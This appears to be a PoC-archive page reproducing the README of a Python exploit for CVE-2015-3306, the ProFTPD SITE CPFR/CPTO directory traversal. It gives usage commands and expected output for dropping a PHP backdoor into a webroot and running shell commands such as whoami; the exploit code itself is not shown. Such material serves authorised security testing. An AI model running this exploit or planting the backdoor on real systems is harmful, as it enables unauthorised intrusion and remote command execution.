关联漏洞
介绍
# CVE-2015-3306 ProFTPD Exploit
This repository contains a Python proof-of-concept (PoC) exploit for **CVE-2015-3306**
> ⚠️ **Warning:** Only use this against systems you own or have explicit permission to test. Unauthorized exploitation is illegal.
---
## Author
**Mohamed EL-KHAROUATI**
---
## Part 1: CVE-2015-3306 ProFTPD Exploit
### Description
CVE-2015-3306 is a directory traversal vulnerability in ProFTPD 1.3.5b and earlier. This exploit allows copying arbitrary files and dropping a PHP backdoor into the webroot. The backdoor can execute arbitrary shell commands.
### Features
- Exploits the directory traversal vulnerability via the `SITE CPFR/CPTO` FTP commands.
- Drops a PHP backdoor (`backdoor.php`) into the specified webroot.
- Executes arbitrary shell commands through the backdoor.
- Supports custom commands via `--rcommand`.
### Requirements
- Python 3.x
- `requests` library (`pip install requests`)
### Usage, Output, and Cleanup (Single Code Block)
```bash
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
文件快照
[4.0K] /data/pocs/e40e02cbba654972d6ad3c9f2f8b14562ac323c9
├── [2.2K] exploit-ftp.py
├── [1.1K] LICENCE
└── [1.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →